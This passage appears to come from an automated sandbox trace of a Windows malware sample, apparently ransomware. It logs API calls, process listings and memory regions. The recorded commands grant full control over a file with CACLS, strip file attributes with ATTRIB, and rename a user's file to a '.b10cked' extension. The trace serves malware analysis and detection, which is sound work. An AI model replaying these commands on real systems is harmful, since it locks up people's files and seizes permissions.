returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0196.600] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0196.600] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0196.600] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0196.600] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0196.600] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0196.600] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0196.601] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0196.601] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0196.601] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0196.601] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0196.601] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0196.601] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0196.601] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0196.601] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0196.601] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0196.601] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0196.601] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0196.601] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0196.601] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0196.601] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0196.601] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0196.601] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0196.601] SetErrorMode (uMode=0x0) returned 0x0 [0196.601] SetErrorMode (uMode=0x1) returned 0x0 [0196.601] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1dd0, lpFilePart=0x20f1a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f1a4*="Desktop") returned 0x18 [0196.601] 
SetErrorMode (uMode=0x0) returned 0x1 [0196.602] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.602] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.606] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.607] FindClose (in: hFindFile=0x390ed8 | out: hFindFile=0x390ed8) returned 1 [0196.607] FindClose (in: hFindFile=0x390ed8 | out: hFindFile=0x390ed8) returned 1 [0196.607] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0196.607] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0196.608] GetConsoleTitleW (in: lpConsoleTitle=0x20f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.767] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f368 | out: lpAttributeList=0x20f2a0, lpSize=0x20f368) returned 1 [0196.767] UpdateProcThreadAttribute (in: lpAttributeList=0x20f2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f360, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f2a0, lpPreviousValue=0x0) returned 1 [0196.767] GetStartupInfoW (in: lpStartupInfo=0x20f25c | out: lpStartupInfo=0x20f25c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0196.767] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0196.768] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All 
Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f2fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f348 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f348*(hProcess=0x50, hThread=0x4c, dwProcessId=0x458, dwThreadId=0xc10)) returned 1 [0196.971] CloseHandle (hObject=0x4c) returned 1 [0196.971] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.971] GetEnvironmentStringsW () returned 0x3a0240* [0196.971] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0196.971] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0197.174] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f23c | out: lpExitCode=0x20f23c*=0x0) returned 1 [0197.174] CloseHandle (hObject=0x50) returned 1 [0197.174] _vsnwprintf (in: _Buffer=0x20f384, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f248 | out: _Buffer="00000000") returned 8 [0197.174] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0197.174] GetEnvironmentStringsW () returned 0x3a22f8* [0197.174] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.174] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.174] GetEnvironmentStringsW () returned 0x3a22f8* [0197.174] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.174] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f2a0 | out: 
lpAttributeList=0x20f2a0) [0197.174] GetConsoleTitleW (in: lpConsoleTitle=0x20f684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0197.175] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0197.175] FindClose (in: hFindFile=0x39e438 | out: hFindFile=0x39e438) returned 1 [0197.175] FindClose (in: hFindFile=0x39e438 | out: hFindFile=0x39e438) returned 1 [0197.175] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0197.175] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0197.175] GetConsoleTitleW (in: lpConsoleTitle=0x20f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.175] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f368 | out: lpAttributeList=0x20f2a0, lpSize=0x20f368) returned 1 [0197.175] UpdateProcThreadAttribute (in: lpAttributeList=0x20f2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f360, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f2a0, lpPreviousValue=0x0) returned 1 [0197.175] GetStartupInfoW (in: lpStartupInfo=0x20f25c | out: lpStartupInfo=0x20f25c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0197.176] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 
[0197.176] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f2fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f348 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", lpProcessInformation=0x20f348*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc58, dwThreadId=0x678)) returned 1 [0197.177] CloseHandle (hObject=0x50) returned 1 [0197.177] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0197.177] GetEnvironmentStringsW () returned 0x3a22f8* [0197.177] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.177] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0197.235] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f23c | out: lpExitCode=0x20f23c*=0x0) returned 1 [0197.235] CloseHandle (hObject=0x4c) returned 1 [0197.235] _vsnwprintf (in: _Buffer=0x20f384, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f248 | out: _Buffer="00000000") returned 8 [0197.235] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0197.235] GetEnvironmentStringsW () returned 0x3a22f8* [0197.235] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.235] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.235] GetEnvironmentStringsW () returned 0x3a22f8* [0197.235] FreeEnvironmentStringsW 
(penv=0x3a22f8) returned 1 [0197.235] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f2a0 | out: lpAttributeList=0x20f2a0) [0197.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.235] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.236] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.236] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.236] SetConsoleInputExeNameW () returned 0x1 [0197.236] GetConsoleOutputCP () returned 0x1b5 [0197.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.236] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.236] exit (_Code=0) Process: id = "456" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea166a0" os_pid = "0x458" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "455" os_parent_pid = "0xbc0" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29034 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29035 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id 
= 29036 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29037 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 29038 start_va = 0xf80000 end_va = 0xf88fff entry_point = 0xf80000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 29039 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29040 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29041 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29042 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 29043 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29044 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29045 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29046 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29047 start_va = 
0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 29048 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 29049 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29050 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 29051 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29052 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 29053 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29054 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 29055 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 651 os_tid = 0xc10 Thread: id = 652 os_tid = 0xc50 Process: id = "457" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" 
os_pid = "0xc58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "455" os_parent_pid = "0xbc0" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29059 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29060 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29061 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29062 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29063 start_va = 0xa10000 end_va = 0xa16fff entry_point = 0xa10000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 29064 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29065 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: 
id = 29066 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29067 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29068 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29069 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29070 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29071 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29072 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 29073 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 29074 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 29075 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29076 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 29077 start_va = 
0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29078 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29079 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 29080 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29081 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29082 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29083 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 29084 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29085 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29086 start_va = 0xc0000 end_va = 
0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29087 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29088 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 653 os_tid = 0x678 Process: id = "458" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xb8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29111 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29112 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29113 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29114 start_va = 0xf0000 end_va = 0x1effff entry_point = 
0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29115 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29116 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29117 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29118 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29119 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29120 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29169 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29170 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29171 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29172 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 29173 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name 
= "private_0x0000000000370000" filename = "" Region: id = 29174 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29175 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29176 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29177 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29178 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29179 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29180 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29181 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29182 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 